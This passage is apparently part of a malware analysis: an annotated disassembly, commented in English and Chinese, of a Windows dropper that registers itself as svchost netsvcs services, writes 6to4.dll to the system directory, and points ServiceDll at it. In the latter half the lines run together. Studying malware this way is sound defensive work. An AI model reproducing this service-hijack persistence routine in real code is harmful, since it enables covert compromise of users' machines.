0040115B  FF15 30204000   call dword ptr [402030]              ; ADVAPI32.CloseServiceHandle
00401161  6A 01           push 1
00401163  E8 75030000     call 004014DD                        ; 004014DD(1)
00401168  EB 12           jmp short 0040117C
0040116A  FF75 E4         push dword ptr [ebp-1C]              ; delete the service
0040116D  FF15 2C204000   call dword ptr [40202C]              ; ADVAPI32.DeleteService
00401173  FF75 E4         push dword ptr [ebp-1C]
00401176  FF15 30204000   call dword ptr [402030]              ; ADVAPI32.CloseServiceHandle
0040117C  8D85 B0F9FFFF   lea eax, dword ptr [ebp-650]         ; reached when isdelfilecevent (ebp-18) is not 1
00401182  8945 FC         mov dword ptr [ebp-4], eax           ; ebp-4 = current position in the netsvcs value
00401185  8B45 FC         mov eax, dword ptr [ebp-4]           ; loop head: current name in the netsvcs multi-string
00401188  0FBE00          movsx eax, byte ptr [eax]
0040118B  85C0            test eax, eax
0040118D  0F84 92010000   je 00401325                          ; first byte zero: end of the multi-string
00401193  6A 00           push 0                               ; lpPassword
00401195  6A 00           push 0                               ; lpServiceStartName
00401197  6A 00           push 0                               ; lpDependencies
00401199  6A 00           push 0                               ; lpdwTagId
0040119B  6A 00           push 0                               ; lpLoadOrderGroup
0040119D  68 C8214000     push 004021C8                        ; ASCII "%SystemRoot%\System32\svchost.exe -k netsvcs"
004011A2  6A 01           push 1                               ; SERVICE_ERROR_NORMAL
004011A4  6A 02           push 2                               ; SERVICE_AUTO_START
004011A6  6A 20           push 20                              ; SERVICE_WIN32_SHARE_PROCESS
004011A8  6A 10           push 10                              ; SERVICE_START
004011AA  FF75 FC         push dword ptr [ebp-4]               ; lpDisplayName = the current netsvcs name
004011AD  FF75 FC         push dword ptr [ebp-4]               ; lpServiceName = the current netsvcs name
004011B0  FF75 F8         push dword ptr [ebp-8]               ; hSCManager: create its own service under a netsvcs group name
004011B3  FF15 04204000   call dword ptr [402004]              ; ADVAPI32.CreateServiceA
004011B9  8945 E4         mov dword ptr [ebp-1C], eax
004011BC  837D E4 00      cmp dword ptr [ebp-1C], 0            ; hserv (ebp-1C): NULL means creation failed, e.g. the service already exists
004011C0  0F84 3E010000   je 00401304
004011C6  68 04010000     push 104
004011CB  8D85 98F7FFFF   lea eax, dword ptr [ebp-868]         ; pdir (ebp-868)
004011D1  50              push eax                             ; get the system directory
004011D2  FF15 54204000   call dword ptr [402054]              ; kernel32.GetSystemDirectoryA
004011D8  68 04010000     push 104
004011DD  6A 00           push 0
004011DF  8D85 A8F8FFFF   lea eax, dword ptr [ebp-758]
004011E5  50              push eax
004011E6  E8 A90A0000     call 00401C94                        ; jmp to MSVCRT.memset
004011EB  83C4 0C         add esp, 0C
004011EE  FF75 FC         push dword ptr [ebp-4]
004011F1  8D85 98F7FFFF   lea eax, dword ptr [ebp-868]
004011F7  50              push eax
004011F8  68 F8214000     push 004021F8                        ; ASCII "%s\%s.dll"
004011FD  8D85 A8F8FFFF   lea eax, dword ptr [ebp-758]
00401203  50              push eax                             ; str_sprintf (ebp-758) = <system directory>\6to4.dll
00401204  FF15 E0204000   call dword ptr [4020E0]              ; USER32.wsprintfA
0040120A  83C4 10         add esp, 10
0040120D  8D85 A8F8FFFF   lea eax, dword ptr [ebp-758]
00401213  50              push eax                             ; create 6to4.dll in the system directory
00401214  E8 10070000     call 00401929                        ; create(str_sprintf)
00401219  85C0            test eax, eax
0040121B  75 0A           jnz short 00401227
0040121D  E9 E2000000     jmp 00401304
00401222  E9 DD000000     jmp 00401304
00401227  68 00040000     push 400                             ; creation succeeded
0040122C  6A 00           push 0
0040122E  8D85 98F3FFFF   lea eax, dword ptr [ebp-C68]         ; str_sprintf2 (ebp-C68): SYSTEM\CurrentControlSet\Services\6to4
00401234  50              push eax
00401235  E8 5A0A0000     call 00401C94                        ; jmp to MSVCRT.memset
0040123A  83C4 0C         add esp, 0C
0040123D  FF75 FC         push dword ptr [ebp-4]
00401240  68 04224000     push 00402204                        ; ASCII "SYSTEM\CurrentControlSet\Services\%s"
00401245  8D85 98F3FFFF   lea eax, dword ptr [ebp-C68]
0040124B  50              push eax
0040124C  FF15 E0204000   call dword ptr [4020E0]              ; USER32.wsprintfA
00401252  83C4 0C         add esp, 0C
00401255  8D85 A4F8FFFF   lea eax, dword ptr [ebp-75C]
0040125B  50              push eax                             ; phkResult
0040125C  68 1F000200     push 2001F                           ; samDesired = KEY_READ | KEY_WRITE
00401261  6A 00           push 0
00401263  8D85 98F3FFFF   lea eax, dword ptr [ebp-C68]
00401269  50              push eax
0040126A  68 02000080     push 80000002                        ; HKEY_LOCAL_MACHINE: open the service key str_sprintf2 (the 6to4 service)
0040126F  FF15 1C204000   call dword ptr [40201C]              ; ADVAPI32.RegOpenKeyExA
00401275  8D45 F4         lea eax, dword ptr [ebp-C]
00401278  50              push eax                             ; lpdwDisposition
00401279  8D85 A4F8FFFF   lea eax, dword ptr [ebp-75C]         ; hreg
0040127F  50              push eax                             ; phkResult
00401280  6A 00           push 0                               ; lpSecurityAttributes
00401282  68 3F000F00     push 0F003F                          ; samDesired = KEY_ALL_ACCESS
00401287  6A 00           push 0                               ; dwOptions
00401289  6A 00           push 0                               ; lpClass
0040128B  6A 00           push 0                               ; Reserved
0040128D  68 2C224000     push 0040222C                        ; ASCII "Parameters"
00401292  FFB5 A4F8FFFF   push dword ptr [ebp-75C]             ; hKey: create the Parameters subkey
00401298  FF15 18204000   call dword ptr [402018]              ; ADVAPI32.RegCreateKeyExA
0040129E  8D85 A8F8FFFF   lea eax, dword ptr [ebp-758]
004012A4  50              push eax                             ; length of <system directory>\6to4.dll
004012A5  FF15 9C204000   call dword ptr [40209C]              ; kernel32.lstrlenA
004012AB  50              push eax                             ; cbData
004012AC  8D85 A8F8FFFF   lea eax, dword ptr [ebp-758]
004012B2  50              push eax                             ; lpData
004012B3  6A 02           push 2                               ; dwType = REG_EXPAND_SZ
004012B5  6A 00           push 0                               ; Reserved
004012B7  68 38224000     push 00402238                        ; ASCII "ServiceDll"
004012BC  FFB5 A4F8FFFF   push dword ptr [ebp-75C]             ; hKey: set ServiceDll to <system directory>\6to4.dll
004012C2  FF15 0C204000   call dword ptr [40200C]              ; ADVAPI32.RegSetValueExA
004012C8  FFB5 A4F8FFFF   push dword ptr [ebp-75C]
004012CE  FF15 10204000   call dword ptr [402010]              ; ADVAPI32.RegCloseKey
004012D4  6A 00           push 0
004012D6  6A 00           push 0
004012D8  FF75 E4         push dword ptr [ebp-1C]              ; start the service
004012DB  FF15 00204000   call dword ptr [402000]              ; ADVAPI32.StartServiceA
004012E1  85C0            test eax, eax
004012E3  75 06           jnz short 004012EB
004012E5  EB 1D           jmp short 00401304
004012E7  EB 1B           jmp short 00401304
004012E9  EB 19           jmp short 00401304
004012EB  FF75 E4         push dword ptr [ebp-1C]
004012EE  FF15 30204000   call dword ptr [402030]              ; ADVAPI32.CloseServiceHandle
004012F4  FF75 F8         push dword ptr [ebp-8]
004012F7  FF15 30204000   call dword ptr [402030]              ; ADVAPI32.CloseServiceHandle
004012FD  6A 01           push 1
004012FF  E8 D9010000     call 004014DD                        ; createdos(b)
00401304  FF75 E4         push dword ptr [ebp-1C]
00401307  FF15 30204000   call dword ptr [402030]              ; ADVAPI32.CloseServiceHandle
0040130D  FF75 FC         push dword ptr [ebp-4]               ; length of the current name (e.g. "6to4")
00401310  FF15 9C204000   call dword ptr [40209C]              ; kernel32.lstrlenA
00401316  8B4D FC         mov ecx, dword ptr [ebp-4]
00401319  8D4401 01       lea eax, dword ptr [ecx+eax+1]       ; skip the name and its NUL: next string in the multi-string
0040131D  8945 FC         mov dword ptr [ebp-4], eax
00401320  E9 60FEFFFF     jmp 00401185                         ; next netsvcs entry
00401325  83A5 B4FDFFFF 0>and dword ptr [ebp-24C], 0           ; second stage: pass flag (ebp-24C) = 0
0040132C  83A5 94F3FFFF 0>and dword ptr [ebp-C6C], 0           ; table index (ebp-C6C) = 0
00401333  EB 0D           jmp short 00401342
00401335  8B85 94F3FFFF   mov eax, dword ptr [ebp-C6C]
0040133B  40              inc eax
0040133C  8985 94F3FFFF   mov dword ptr [ebp-C6C], eax         ; index++
00401342  83BD 94F3FFFF 0>cmp dword ptr [ebp-C6C], 7
00401349  0F8D 78010000   jge 004014C7                         ; the built-in table has 7 entries
0040134F  8B85 94F3FFFF   mov eax, dword ptr [ebp-C6C]
00401355  FF3485 00304000 push dword ptr [eax*4+403000]        ; service name table at 403000
0040135C  8D85 60FFFFFF   lea eax, dword ptr [ebp-A0]
00401362  50              push eax
00401363  FF15 94204000   call dword ptr [402094]              ; kernel32.lstrcpyA: copy name[index] to ebp-A0
00401369  8B85 94F3FFFF   mov eax, dword ptr [ebp-C6C]
0040136F  FF3485 1C304000 push dword ptr [eax*4+40301C]        ; second table at 40301C: the matching DLL name
00401376  8D85 B8FDFFFF   lea eax, dword ptr [ebp-248]
0040137C  50              push eax
0040137D  FF15 94204000   call dword ptr [402094]              ; kernel32.lstrcpyA: copy it to ebp-248
00401383  68 FF010F00     push 0F01FF                          ; dwDesiredAccess = SERVICE_ALL_ACCESS
00401388  8D85 60FFFFFF   lea eax, dword ptr [ebp-A0]
0040138E  50              push eax
0040138F  FF75 F8         push dword ptr [ebp-8]
00401392  FF15 14204000   call dword ptr [402014]              ; ADVAPI32.OpenServiceA: open the service by that name
00401398  8945 E4         mov dword ptr [ebp-1C], eax
0040139B  837D E4 00      cmp dword ptr [ebp-1C], 0
0040139F  75 02           jnz short 004013A3
004013A1  EB 92           jmp short 00401335                   ; not present: next table entry
004013A3  6A 1C           push 1C
004013A5  6A 00           push 0
004013A7  8D85 78F3FFFF   lea eax, dword ptr [ebp-C88]         ; SERVICE_STATUS (1Ch bytes)
004013AD  50              push eax
004013AE  E8 E1080000     call 00401C94                        ; jmp to MSVCRT.memset
004013B3  83C4 0C         add esp, 0C
004013B6  8D85 78F3FFFF   lea eax, dword ptr [ebp-C88]
004013BC  50              push eax
004013BD  FF75 E4         push dword ptr [ebp-1C]
004013C0  FF15 20204000   call dword ptr [402020]              ; ADVAPI32.QueryServiceStatus
004013C6  83BD 7CF3FFFF 0>cmp dword ptr [ebp-C84], 1           ; dwCurrentState == SERVICE_STOPPED?
004013CD  74 33           je short 00401402
004013CF  83BD B4FDFFFF 0>cmp dword ptr [ebp-24C], 0           ; running: only stop it during the second pass
004013D6  75 0A           jnz short 004013E2
004013D8  E9 B9000000     jmp 00401496
004013DD  E9 B4000000     jmp 00401496
004013E2  8D85 78F3FFFF   lea eax, dword ptr [ebp-C88]
004013E8  50              push eax
004013E9  6A 01           push 1                               ; SERVICE_CONTROL_STOP
004013EB  FF75 E4         push dword ptr [ebp-1C]
004013EE  FF15 28204000   call dword ptr [402028]              ; ADVAPI32.ControlService: stop the service
004013F4  85C0            test eax, eax
004013F6  75 0A           jnz short 00401402
004013F8  E9 99000000     jmp 00401496
004013FD  E9 94000000     jmp 00401496
00401402  68 04010000     push 104
00401407  6A 00           push 0
00401409  8D85 70F2FFFF   lea eax, dword ptr [ebp-D90]
0040140F  50              push eax
00401410  E8 7F080000     call 00401C94                        ; jmp to MSVCRT.memset
00401415  83C4 0C         add esp, 0C
00401418  68 04010000     push 104
0040141D  8D85 70F2FFFF   lea eax, dword ptr [ebp-D90]
00401423  50              push eax
00401424  FF15 54204000   call dword ptr [402054]              ; kernel32.GetSystemDirectoryA
0040142A  68 44224000     push 00402244
0040142F  8D85 70F2FFFF   lea eax, dword ptr [ebp-D90]
00401435  50              push eax
00401436  FF15 58204000   call dword ptr [402058]              ; kernel32.lstrcatA: system directory + the string at 402244
0040143C  8D85 B8FDFFFF   lea eax, dword ptr [ebp-248]
00401442  50              push eax
00401443  8D85 70F2FFFF   lea eax, dword ptr [ebp-D90]
00401449  50              push eax
0040144A  FF15 58204000   call dword ptr [402058]              ; kernel32.lstrcatA: + the DLL name from the table
00401450  8D85 70F2FFFF   lea eax, dword ptr [ebp-D90]
00401456  50              push eax
00401457  E8 CD040000     call 00401929                        ; create(path): write that DLL
0040145C  85C0            test eax, eax
0040145E  75 06           jnz short 00401466
00401460  EB 34           jmp short 00401496
00401462  EB 32           jmp short 00401496
00401464  EB 30           jmp short 00401496
00401466  6A 00           push 0
00401468  6A 00           push 0
0040146A  FF75 E4         push dword ptr [ebp-1C]
0040146D  FF15 00204000   call dword ptr [402000]              ; ADVAPI32.StartServiceA
00401473  85C0            test eax, eax
00401475  75 06           jnz short 0040147D
00401477  EB 1D           jmp short 00401496
00401479  EB 1B           jmp short 00401496
0040147B  EB 19           jmp short 00401496
0040147D  FF75 E4         push dword ptr [ebp-1C]
00401480  FF15 30204000   call dword ptr [402030]              ; ADVAPI32.CloseServiceHandle
00401486  FF75 F8         push dword ptr [ebp-8]
00401489  FF15 30204000   call dword ptr [402030]              ; ADVAPI32.CloseServiceHandle
0040148F  6A 01           push 1
00401491  E8 47000000     call 004014DD                        ; 004014DD(1)
00401496  FF75 E4         push dword ptr [ebp-1C]
00401499  FF15 30204000   call dword ptr [402030]              ; ADVAPI32.CloseServiceHandle
0040149F  83BD 94F3FFFF 0>cmp dword ptr [ebp-C6C], 6           ; last table entry?
004014A6  75 1A           jnz short 004014C2
004014A8  83BD B4FDFFFF 0>cmp dword ptr [ebp-24C], 0           ; first pass finished?
004014AF  75 11           jnz short 004014C2
004014B1  C785 B4FDFFFF 0>mov dword ptr [ebp-24C], 1           ; flag = 1 and index = -1: walk the table a second time, now stopping running services
004014BB  838D 94F3FFFF F>or dword ptr [ebp-C6C], FFFFFFFF
004014C2  E9 6EFEFFFF     jmp 00401335
004014C7  FF75 F8         push dword ptr [ebp-8]
004014CA  FF15 30204000   call dword ptr [402030]              ; ADVAPI32.CloseServiceHandle
004014D0  6A 00           push 0
004014D2  E8 06000000     call 004014DD                        ; 004014DD(0)
004014D7  33C0            xor eax, eax
004014D9  C9              leave
004014DA  C2 1000         retn 10

Functions defined in the main program:
fcheckfile returns a BOOL. psubstr is an output pointer: it receives the part of the command line (current path and file name) that follows the space. The BOOL indicates whether the psubstr file was deleted and the event was created.

004016FF  55              push ebp                             ; fcheckfile(psubstr)
00401700  8BEC            mov ebp, esp
00401702  83EC 18         sub esp, 18                          ; 18h bytes of local variables
00401705  8365 FC 00      and dword ptr [ebp-4], 0             ; result (ebp-4) = 0, then fetch the command line
00401709  FF15 44204000   call dword ptr [402044]              ; kernel32.GetCommandLineA
0040170F  8945 E8         mov dword ptr [ebp-18], eax          ; luj (ebp-18) = full command line of tem81
00401712  6A 20           push 20                              ; the space character
00401714  FF75 E8         push dword ptr [ebp-18]              ; find the last occurrence of the space
00401717  FF15 BC204000   call dword ptr [4020BC]              ; MSVCRT.strrchr
0040171D  59              pop ecx                              ; caller balances the stack
0040171E  59              pop ecx
0040171F  8945 F8         mov dword ptr [ebp-8], eax           ; pspace (ebp-8) = pointer to that space
00401722  837D F8 00      cmp dword ptr [ebp-8], 0
00401726  74 54           je short 0040177C                    ; no space in the command line: skip
00401728  8B45 F8         mov eax, dword ptr [ebp-8]           ; otherwise eax = pspace
0040172B  40              inc eax                              ; eax now points to the character after the space
0040172C  8945 F8         mov dword ptr [ebp-8], eax
0040172F  FF75 F8         push dword ptr [ebp-8]               ; length of the text after the space
00401732  FF15 9C204000   call dword ptr [40209C]              ; kernel32.lstrlenA
00401738  8945 F0         mov dword ptr [ebp-10], eax          ; sublen (ebp-10)
0040173B  837D F0 01      cmp dword ptr [ebp-10], 1            ; sublen <= 1: skip the call
0040173F  7E 0B           jle short 0040174C
00401741  837D F0 07      cmp dword ptr [ebp-10], 7
00401745  7D 05           jge short 0040174C                   ; sublen >= 7: skip it as well
00401747  E8 1CFFFFFF     call 00401668                        ; called only for 2 <= sublen <= 6
0040174C  837D F0 06      cmp dword ptr [ebp-10], 6
00401750  7E 2A           jle short 0040177C                   ; sublen <= 6: skip the delete
00401752  C745 FC 0100000>mov dword ptr [ebp-4], 1             ; result (ebp-4) = 1
00401759  FF75 F8         push dword ptr [ebp-8]               ; the text after the space
0040175C  FF75 08         push dword ptr [ebp+8]               ; psubstr, the function's only argument: copy that text into it
0040175F  FF15 94204000   call dword ptr [402094]              ; kernel32.lstrcpyA
00401765  68 80000000     push 80                              ; FILE_ATTRIBUTE_NORMAL
0040176A  FF75 08         push dword ptr [ebp+8]               ; reset the attributes of the file named by psubstr
0040176D  FF15 6C204000   call dword ptr [40206C]              ; kernel32.SetFileAttributesA
00401773  FF75 08         push dword ptr [ebp+8]               ; delete the file named by psubstr
00401776 FF15 90204000 call dword ptr [402090] ; kernel32.DeleteFileA 0040177C 8365 F4 00 and dword ptr [ebp-C], 0 ; 变量 hevent(ebp-c)清零 00401780 68 E0224000 push 004022E0 ; ASCII "4F9E860C-9BE9-474b-8FD1-F0EEDB20C77B" 00401785 6A 00 push 0 ; 事件的初 始状态 00401787 6A 01 push 1 ; 是否手动 设置受信 00401789 6A 00 push 0 ; 事件的安 全性,创建事件 0040178B FF15 50204000 call dword ptr [402050] ; kernel32.CreateEventA 00401791 8945 F4 mov dword ptr [ebp- C], eax ; hevent=事件句柄 00401794 837D F4 00 cmp dword ptr [ebp-C], 0 ; 如果事件 句柄为空,跳转 00401798 74 0D je short 004017A7 0040179A FF15 60204000 call dword ptr [402060] ; ntdll.RtlGetLastWin32Error 004017A0 3D B7000000 cmp eax, 0B7 ; 如果事件 句柄hevent是不是空,判断最后错误是否是b7 004017A5 75 7A jnz short 00401821 ; 不是b7 错误就跳到,关闭句柄 004017A7 837D F4 00 cmp dword ptr [ebp-C], 0 ; 是b7错 误,hevent句柄再判断是否外为零 004017AB 74 09 je short 004017B6 004017AD FF75 F4 push dword ptr [ebp-C] 004017B0 FF15 88204000 call dword ptr [402088] ; kernel32.CloseHandle 004017B6 837D FC 00 cmp dword ptr [ebp-4], 0 ; 判断句柄 是否为零 004017BA 75 14 jnz short 004017D0 ; 不为零就 跳转 004017BC 833D 38304000 0>cmp dword ptr [403038], 1 004017C3 75 0B jnz short 004017D0 004017C5 6A 00 push 0 004017C7 E8 11FDFFFF call 004014DD 004017CC 33C0 xor eax, eax 004017CE EB 5D jmp short 0040182D 004017D0 8365 EC 00 and dword ptr [ebp-14], 0 004017D4 EB 07 jmp short 004017DD 004017D6 8B45 EC mov eax, dword ptr [ebp-14] 004017D9 40 inc eax 004017DA 8945 EC mov dword ptr [ebp-14], eax 004017DD 817D EC 9001000>cmp dword ptr [ebp-14], 190 004017E4 7D 3B jge short 00401821 004017E6 6A 32 push 32 004017E8 FF15 48204000 call dword ptr [402048] ; kernel32.Sleep 004017EE 8365 F4 00 and dword ptr [ebp-C], 0 004017F2 68 E0224000 push 004022E0 ; ASCII "4F9E860C-9BE9-474b-8FD1-F0EEDB20C77B" 004017F7 6A 00 push 0 004017F9 6A 01 push 1 004017FB 6A 00 push 0 004017FD FF15 50204000 call dword ptr [402050] ; kernel32.CreateEventA 00401803 8945 F4 mov dword ptr [ebp-C], eax 00401806 837D F4 00 cmp dword ptr [ebp-C], 0 0040180A 74 11 je short 
0040181D 0040180C FF15 60204000 call dword ptr [402060] ; ntdll.RtlGetLastWin32Error 00401812 3D B7000000 cmp eax, 0B7 00401817 74 04 je short 0040181D 00401819 EB 06 jmp short 00401821 0040181B EB 02 jmp short 0040181F 0040181D ^ EB B7 jmp short 004017D6 0040181F ^ EB B5 jmp short 004017D6 00401821 FF75 F4 push dword ptr [ebp-C] 00401824 FF15 88204000 call dword ptr [402088] ; kernel32.CloseHandle 0040182A 8B45 FC mov eax, dword ptr [ebp-4] 0040182D C9 leave 0040182E C2 0400 retn 4 ; fcheckfile 函数结束 函数openservice(pnetsvcs,psubspace,pz)py是ebp-1a8空格后的字符 pnetsvcs,输入的参数,svchost注册表netsvcs键的 值:6to4 AppMgmt AudioSrv Browser CryptSvc DMServer DHCP ERSvc等等 psubspace, pz, 00401B09 55 push ebp ; 调用函数 openservice(pnetsvcs,psubspace,pz)py是ebp-1a8空格后的字符 00401B0A 8BEC mov ebp, esp 00401B0C 81EC 38040000 sub esp, 438 00401B12 8365 F4 00 and dword ptr [ebp-C], 0 ; ebp- c等于零 00401B16 8B45 08 mov eax, dword ptr [ebp+8] ; 取 pnetsvcs 00401B19 8945 FC mov dword ptr [ebp- 4], eax ; s_1(ebp-4)等于pnetsvcs 00401B1C EB 13 jmp short 00401B31 00401B1E FF75 FC push dword ptr [ebp-4] 00401B21 FF15 9C204000 call dword ptr [40209C] ; kernel32.lstrlenA 00401B27 8B4D FC mov ecx, dword ptr [ebp-4] 00401B2A 8D4401 01 lea eax, dword ptr [ecx+eax+1] 00401B2E 8945 FC mov dword ptr [ebp-4], eax 00401B31 8B45 FC mov eax, dword ptr [ebp-4] ; 取得 s_1(6to4字符串) 00401B34 0FBE00 movsx eax, byte ptr [eax] ; 取第一个 字符 00401B37 85C0 test eax, eax ; 判断是否 是零 00401B39 0F84 4E010000 je 00401C8D ; 如果是零 跳转 00401B3F 83A5 ECFBFFFF 0>and dword ptr [ebp- 414], 0 ; s_2handle(ebp-414)清零 00401B46 68 00040000 push 400 00401B4B 6A 00 push 0 00401B4D 8D85 F0FBFFFF lea eax, dword ptr [ebp- 410] ; s_sprintf(ebp-410)以后400字节清零 00401B53 50 push eax ; ebp- 410后面400字节也清零 00401B54 E8 3B010000 call 00401C94 ; jmp 到 MSVCRT.memset 00401B59 83C4 0C add esp, 0C ; 平衡堆栈 00401B5C FF75 FC push dword ptr [ebp-4] ; 6toc 字符地址 00401B5F 68 40234000 push 00402340 ; ASCII "SYSTEM\CurrentControlSet\Services\%s\Parameters" 00401B64 8D85 F0FBFFFF lea eax, 
dword ptr [ebp-410] ; 存储格式 化后的字符地址 00401B6A 50 push eax ; system\currentcontrolset/services\6to4\parameters 00401B6B FF15 E0204000 call dword ptr [4020E0] ; USER32.wsprintfA 00401B71 83C4 0C add esp, 0C ; 平衡堆栈 00401B74 8D85 ECFBFFFF lea eax, dword ptr [ebp-414] ; 取得 s_2(ebp-414)的地址 00401B7A 50 push eax ; 返回的句 柄s_2handle = 0012EE08 00401B7B 6A 01 push 1 ; Access = KEY_QUERY_VALUE 00401B7D 6A 00 push 0 ; reserved=0 00401B7F 8D85 F0FBFFFF lea eax, dword ptr [ebp-410] ; 取得 s_sprintf(ebp-410)的地址 00401B85 50 push eax ; Subkey = "SYSTEM\CurrentControlSet\Services\6to4\Parameters" 00401B86 68 02000080 push 80000002 ; hKey = HKEY_LOCAL_MACHINE 00401B8B FF15 1C204000 call dword ptr [40201C] ; ADVAPI32.RegOpenKeyExA 00401B91 85C0 test eax, eax ; 打开支持 服务的dll注册选项 00401B93 0F85 EF000000 jnz 00401C88 ; 不等于 零,则打开错误跳转 00401B99 68 00040000 push 400 00401B9E 6A 00 push 0 00401BA0 8D85 F0FBFFFF lea eax, dword ptr [ebp-410] ; 清空s ——sprintf 00401BA6 50 push eax 00401BA7 E8 E8000000 call 00401C94 ; jmp 到 MSVCRT.memset 00401BAC 83C4 0C add esp, 0C 00401BAF C745 F8 0004000>mov dword ptr [ebp- 8], 400 ; s_size(ebp-8)赋值400 00401BB6 8D45 F8 lea eax, dword ptr [ebp-8] 00401BB9 50 push eax 00401BBA 8D85 F0FBFFFF lea eax, dword ptr [ebp- 410] ; sprintf接受值当前的服务链接库 00401BC0 50 push eax 00401BC1 8D45 F0 lea eax, dword ptr [ebp-10] ; s_5valuetype(ebp-10) 00401BC4 50 push eax ; pValueType = 0012F20C 00401BC5 6A 00 push 0 ; Reserved = NULL 00401BC7 68 38224000 push 00402238 ; ValueName = "ServiceDll" 00401BCC FFB5 ECFBFFFF push dword ptr [ebp- 414] ; s_2handle句柄,搜索服务当前的支持动态链接库 00401BD2 FF15 08204000 call dword ptr [402008] ; ADVAPI32.RegQueryValueExA 00401BD8 FF75 0C push dword ptr [ebp+C] ; 第二参数 psubspace进栈 00401BDB 8D85 F0FBFFFF lea eax, dword ptr [ebp-410] 00401BE1 50 push eax ; sprintf 接受值 00401BE2 FF15 64204000 call dword ptr [402064] ; kernel32.lstrcmpiA 00401BE8 85C0 test eax, eax 00401BEA 0F85 8C000000 jnz 00401C7C ; 如果 psubspace和sprintf不一样跳转 00401BF0 FF75 FC push dword ptr [ebp-4] ; 如果一 
样,把这个服务名 00401BF3 FF75 10 push dword ptr [ebp+10] ; 把服务值 赋给pz地址处 00401BF6 FF15 94204000 call dword ptr [402094] ; kernel32.lstrcpyA 00401BFC 68 3F000F00 push 0F003F 00401C01 6A 00 push 0 00401C03 6A 00 push 0 ; 打开数据 库连接 00401C05 FF15 24204000 call dword ptr [402024] ; ADVAPI32.OpenSCManagerA 00401C0B 8985 E8FBFFFF mov dword ptr [ebp-418], eax 00401C11 6A 20 push 20 00401C13 FF75 FC push dword ptr [ebp-4] 00401C16 FFB5 E8FBFFFF push dword ptr [ebp-418] ; 打开服务 这个服务 00401C1C FF15 14204000 call dword ptr [402014] ; ADVAPI32.OpenServiceA 00401C22 8985 E4FBFFFF mov dword ptr [ebp- 41C], eax ; hservice(ebp-41c) 00401C28 6A 1C push 1C 00401C2A 6A 00 push 0 00401C2C 8D85 C8FBFFFF lea eax, dword ptr [ebp-438] 00401C32 50 push eax 00401C33 E8 5C000000 call 00401C94 ; jmp 到 MSVCRT.memset 00401C38 83C4 0C add esp, 0C 00401C3B 8D85 C8FBFFFF lea eax, dword ptr [ebp-438] 00401C41 50 push eax 00401C42 6A 01 push 1 00401C44 FFB5 E4FBFFFF push dword ptr [ebp-41C] 00401C4A FF15 28204000 call dword ptr [402028] ; ADVAPI32.ControlService 00401C50 8945 F4 mov dword ptr [ebp-C], eax 00401C53 FFB5 E4FBFFFF push dword ptr [ebp-41C] 00401C59 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle 00401C5F FFB5 E8FBFFFF push dword ptr [ebp-418] 00401C65 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle 00401C6B FFB5 ECFBFFFF push dword ptr [ebp-414] 00401C71 FF15 10204000 call dword ptr [402010] ; ADVAPI32.RegCloseKey 00401C77 8B45 F4 mov eax, dword ptr [ebp-C] 00401C7A EB 14 jmp short 00401C90 00401C7C FFB5 ECFBFFFF push dword ptr [ebp-414] ; 关闭打开 的注册表 00401C82 FF15 10204000 call dword ptr [402010] ; ADVAPI32.RegCloseKey 00401C88 ^ E9 91FEFFFF jmp 00401B1E ; 循环查找 下一项注册表 00401C8D 8B45 F4 mov eax, dword ptr [ebp-C] 00401C90 C9 leave 00401C91 C2 0C00 retn 0C create(文件名)函数,创建文件, createdos函数,创建一个批处理文件,并执行,成功返回true。 6to4.dll文件: 6to4.dll文件也是upx加壳的,它的主程序入口是:10005D51 6to4.dll主程序,主要是在100032FD处f(x,y,z)函数中创建了线程线程,线程的过程函数在332a地址。 主程序的分析: 10005D51 55 push ebp ; 主程序入口 10005D52 
8BEC mov ebp, esp 10005D54 53 push ebx ; 模块入口点 10005D55 8B5D 08 mov ebx, dword ptr [ebp+8] ; 参数 x,6to4.10000000 10005D58 56 push esi 10005D59 8B75 0C mov esi, dword ptr [ebp+C] ; 参数y,输入参 数个数 10005D5C 57 push edi 10005D5D 8B7D 10 mov edi, dword ptr [ebp+10] ; 参数z 10005D60 85F6 test esi, esi 10005D62 75 09 jnz short 10005D6D ; y!=0,跳转 10005D64 833D 10900010 0>cmp dword ptr [10009010], 0 ; 如果 y==0,再比较【10009010】==0 10005D6B EB 26 jmp short 10005D93 10005D6D 83FE 01 cmp esi, 1 ; 如果y==1跳 转 10005D70 74 05 je short 10005D77 10005D72 83FE 02 cmp esi, 2 10005D75 75 22 jnz short 10005D99 10005D77 A1 9C940010 mov eax, dword ptr [1000949C] ; y==1跳转到 这里,判断【1000949c】是否为零 10005D7C 85C0 test eax, eax 10005D7E 74 09 je short 10005D89 10005D80 57 push edi 10005D81 56 push esi 10005D82 53 push ebx 10005D83 FFD0 call eax 10005D85 85C0 test eax, eax 10005D87 74 0C je short 10005D95 ; 为零就跳转 10005D89 57 push edi ; y==1, 【1000949c】==零就跳到这里 10005D8A 56 push esi 10005D8B 53 push ebx 10005D8C E8 15FFFFFF call 10005CA6 ; 调用函数f1 【4910】0(x,y,z),分配80的空间指针在9498处返回true 10005D91 85C0 test eax, eax 10005D93 75 04 jnz short 10005D99 ; 函数f1 【4910】0(x,y,z)结果返回不是零跳转 10005D95 33C0 xor eax, eax 10005D97 EB 4E jmp short 10005DE7 10005D99 57 push edi 10005D9A 56 push esi 10005D9B 53 push ebx 10005D9C E8 5CD5FFFF call 100032FD ; 调用 f(x,y,z)创建线程线程过程函数332a 10005DA1 83FE 01 cmp esi, 1 10005DA4 8945 0C mov dword ptr [ebp+C], eax ; 返回bool型 变量,函数的第二个参数给为是否调用创建线程 10005DA7 75 0C jnz short 10005DB5 10005DA9 85C0 test eax, eax 10005DAB 75 37 jnz short 10005DE4 ; 返回f返回值不 是零就跳转结束 10005DAD 57 push edi 10005DAE 50 push eax 10005DAF 53 push ebx 10005DB0 E8 F1FEFFFF call 10005CA6 ; 调用函数f1 【4910】0(x,y,z) 10005DB5 85F6 test esi, esi 10005DB7 74 05 je short 10005DBE 10005DB9 83FE 03 cmp esi, 3 10005DBC 75 26 jnz short 10005DE4 10005DBE 57 push edi 10005DBF 56 push esi 10005DC0 53 push ebx 10005DC1 E8 E0FEFFFF call 10005CA6 ; 调用函数f1 【4910】0(x,y,z) 10005DC6 85C0 test eax, eax 10005DC8 75 03 jnz short 10005DCD 10005DCA 2145 0C and 
